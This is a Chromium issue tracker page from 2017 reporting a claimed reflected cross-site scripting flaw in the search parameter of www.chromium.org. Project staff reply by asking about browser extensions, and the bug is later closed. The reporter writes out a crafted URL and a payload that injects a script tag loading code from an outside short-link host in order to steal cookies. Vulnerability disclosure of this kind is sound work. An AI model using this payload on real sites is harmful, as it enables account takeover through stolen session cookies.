Issue metadata
Sign in to add a comment
|
Security: Google's http://www.chromium.org Reflected XSS
Reported by
amanmahe...@gmail.com,
May 20 2017
|
||||||||||||||||||
Issue descriptionI have found that http://www.chromium.org application is vulnerable to Reflected Cross site Scripting attack as s parameter of this applications following Url http://www.chromium.org/?s=test is used for inputting an searching but as there is no proper input validation, filtration or sanitation on server side nor there is any output encoding etc to prevent this Reflected Cross site Scripting Vulnerability if the attacker uses the cross domain XSS payload with the combination of comments. So the attacker easily can steal the cookies(as http only cookie attribute missing) of any of those website users and can easily compromise there account. Original XSS Vulnerable Url(Reflected XSS Via GET & POST Requests while searching & by Injecting the XSS Payload in Search field): http://www.chromium.org/?s=test Crafted XSS Vulnerable Url: http://www.chromium.org/?s="><script src=//goo.gl/p2yht/><!-- XSS Payloads: "><script src=//goo.gl/p2yht/><!-- Vulnerable Parameter: s VERSION Chrome Version: [57.029] + [stable] Operating System: [Windows 10]
,
May 22 2017
Also, do you have any extensions installed? If so, can you try it with the extensions disabled? In the past we've seen extentions re-write pages so as to make them unsafe.
,
May 29 2017
,
Sep 4 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by elawrence@chromium.org
, May 20 2017